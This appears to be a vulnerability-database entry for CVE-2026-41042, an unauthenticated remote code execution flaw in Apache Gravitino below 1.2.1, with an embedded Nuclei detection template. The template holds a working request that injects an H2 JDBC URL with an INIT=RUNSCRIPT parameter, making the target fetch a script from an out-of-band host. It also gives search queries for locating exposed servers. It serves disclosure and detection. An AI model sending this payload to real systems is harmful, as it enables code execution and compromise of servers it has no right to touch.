Apache Gravitino < 1.2.1 - Unauthenticated Remote Code Execution
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2026-41042 | 8 Jul 202611:38 | – | attackerkb | |
| CVE-2026-41042 | 8 Jul 202616:20 | – | circl | |
| CVE-2026-41042 | 8 Jul 202611:38 | – | cve | |
| CVE-2026-41042 Apache Gravitino: Unauthenticated callers can supply a malicious H2 JDBC URL through the testConnection API, which executes arbitrary Java code on the server via H2's INIT parameter | 8 Jul 202611:38 | – | cvelist | |
| Exploit for CVE-2026-41042 | 17 Aug 202611:15 | – | githubexploit | |
| EUVD-2026-42221 | 8 Jul 202611:38 | – | euvd | |
| CVE-2026-41042 | 8 Jul 202612:17 | – | nvd | |
| PT-2026-56399 | 8 Jul 202600:00 | – | ptsecurity | |
| Arbitrary Code Injection | 8 Jul 202614:38 | – | snyk | |
| Remote Code Execution (RCE) | 16 Jul 202606:03 | – | veracode |
10
id: CVE-2026-41042
info:
name: Apache Gravitino < 1.2.1 - Unauthenticated Remote Code Execution
author: buzhimingdeaikun
severity: critical
description: |
Apache Gravitino < 1.2.1 contains a remote code execution caused by unsanitized H2 JDBC URL via testConnection API using H2's INIT parameter, letting unauthenticated attackers execute arbitrary Java code remotely, exploit requires H2 usage.
impact: |
Unauthenticated attackers can execute arbitrary Java code on the server, potentially leading to full system compromise.
remediation: |
Upgrade to version 1.2.1 or later.
reference:
- https://github.com/advisories/GHSA-59xm-4m8c-g3xj
- https://lists.apache.org/thread/vdh88wc6j5b38v65ncb111wbbnkf6bvm
- https://nvd.nist.gov/vuln/detail/CVE-2026-41042
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2026-41042
epss-score: 0.00285
epss-percentile: 0.21093
cwe-id: CWE-20
metadata:
verified: true
max-request: 2
vendor: apache
product: gravitino
shodan-query: title:"Gravitino"
fofa-query: title="Gravitino"
tags: cve,cve2026,apache,gravitino,rce,unauth,oast,h2,jdbc
variables:
ml_name: "{{rand_base(6)}}"
db_name: "{{rand_base(8)}}"
filename: "{{to_lower(rand_text_alpha(5))}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /api/metalakes HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name":"{{ml_name}}"}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(content_type, "application/json")
condition: and
internal: true
- raw:
- |
POST /api/metalakes/{{ml_name}}/catalogs/testConnection HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: application/vnd.gravitino.v1+json
{"name":"h2rce","type":"RELATIONAL","provider":"jdbc-mysql","properties":{"jdbc-url":"jdbc:h2:mem:{{db_name}};INIT=RUNSCRIPT FROM 'http://{{interactsh-url}}/{{filename}}.sql'","jdbc-user":"sa","jdbc-password":"","jdbc-driver":"org.h2.Driver"}}
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, "http")
- contains(interactsh_request, "/{{filename}}.sql")
- status_code == 500
condition: and
# digest: 4b0a00483046022100cab15d8998c81cc88a05c32ccc585a568faf36c6900936e0d47ac68e7a316aee022100dc92f386c51b617d34c191faa5a07797b4f1cae8fcd52b8f5aa6a74269208338:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Aug 2026 19:41Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.19.1
EPSS0.00285
SSVC